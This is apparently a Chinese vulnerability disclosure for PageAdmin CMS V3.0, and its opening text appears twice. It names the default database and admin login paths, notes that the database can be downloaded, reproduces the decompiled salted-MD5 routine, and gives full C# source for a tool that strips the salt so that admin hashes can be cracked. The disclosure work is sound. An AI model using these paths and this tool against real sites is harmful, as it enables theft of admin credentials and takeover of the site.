<p>PageAdmin CMS V3.0版,默认数据库地址“/e/database/v3.mdb“,默认后台地址:“/e/master/login.aspx”,由于数据库地址未做限制,导致可以下载。通过逆向管理员MD5加密算法获得md5密文,并通过md5密文可以破解管理员密码。</p><p>发现非常规MD5加密,于是使用ILSPY逆向源代码,查看加密方式</p><pre class="">public string Get_Md5(string s) { MD5 mD = new MD5CryptoServiceProvider(); Encoding encoding = Encoding.GetEncoding("UTF-8"); string s2 = "pageadmin cms"; byte[] array = mD.ComputeHash(encoding.GetBytes(s)); byte[] array2 = mD.ComputeHash(encoding.GetBytes(s2)); StringBuilder stringBuilder = new StringBuilder(32); for (int i = 0; i < array.Length; i++) { stringBuilder.Append(((int)(array[i] + array2[i])).ToString("x").PadLeft(2, '0')); } </pre><p>这是逆向工具的代码:</p><pre class=""><code>public static String unPageAdminPass(String pstr)<br> { <br> MD5 mD = new MD5CryptoServiceProvider();<br> Encoding encoding = Encoding.GetEncoding("UTF-8");<br> string s2 = "pageadmin cms";<br> byte[] array2 = mD.ComputeHash(encoding.GetBytes(s2));<br> StringBuilder stringBuilder = new StringBuilder(16);<br>...
<p>PageAdmin CMS V3.0版,默认数据库地址“/e/database/v3.mdb“,默认后台地址:“/e/master/login.aspx”,由于数据库地址未做限制,导致可以下载。通过逆向管理员MD5加密算法获得md5密文,并通过md5密文可以破解管理员密码。</p><p>发现非常规MD5加密,于是使用ILSPY逆向源代码,查看加密方式</p><pre class="">public string Get_Md5(string s) { MD5 mD = new MD5CryptoServiceProvider(); Encoding encoding = Encoding.GetEncoding("UTF-8"); string s2 = "pageadmin cms"; byte[] array = mD.ComputeHash(encoding.GetBytes(s)); byte[] array2 = mD.ComputeHash(encoding.GetBytes(s2)); StringBuilder stringBuilder = new StringBuilder(32); for (int i = 0; i < array.Length; i++) { stringBuilder.Append(((int)(array[i] + array2[i])).ToString("x").PadLeft(2, '0')); } </pre><p>这是逆向工具的代码:</p><pre class=""><code>public static String unPageAdminPass(String pstr)<br> { <br> MD5 mD = new MD5CryptoServiceProvider();<br> Encoding encoding = Encoding.GetEncoding("UTF-8");<br> string s2 = "pageadmin cms";<br> byte[] array2 = mD.ComputeHash(encoding.GetBytes(s2));<br> StringBuilder stringBuilder = new StringBuilder(16);<br> int index = 0;<br> for (int i = 0; i < pstr.Length;)<br> {<br> //array[i] + array2[i]最小值为0,0的ascii码最小为30,最大为512,30的16进制为1E,512的16进制为200<br> //关键,这里如果错了,md5会逆向失败,这里只能大约计算通常不会小于20,如果小于,说明应该是3位长度<br> //如果破解异常,只能手工识别将密文分成16段,逆向回来<br> //通常取2个字符,如果是1开头或2开头需要取3位字符,如果2开头,可能为“200”,这种几率很小<br> String sd_s = pstr.Substring(i, 2);<br> if (pstr.Substring(i, 3).StartsWith("200"))<br> {<br> //如果取3位为200,就取3位<br> sd_s = pstr.Substring(i, 3);<br> i += 3;<br> }<br> else if (sd_s.StartsWith("1"))<br> {<br> //如果以sartNUM开头的同样取3位<br> sd_s=pstr.Substring(i, 3);<br> i += 3;<br> }<br> else {<br> i += 2;<br> }<br> if (sd_s.StartsWith("0")) {<br> //0开头去掉(padleft填充了0,逆向回去,就要替换)<br> sd_s = sd_s.Remove(0);<br> }<br> //165 9f e8 ec 102 189 9a a1 79 170 1ad 110 14e cd de 1a4<br> int t = Convert.ToInt32(sd_s, 16);<br> int r = t - (int)array2[index];<br> stringBuilder.Append(r.ToString("x").PadLeft(2,'0'));<br> index++;<br> }<br> return stringBuilder.ToString();<br> <br> }</code></pre><p><img data-image-size="599,333" src="https://images.seebug.org/contribute/68277f77-c171-44bd-9145-9bd1a7980ee8-Clipboard Image.png" alt="Clipboard Image.png"><br></p>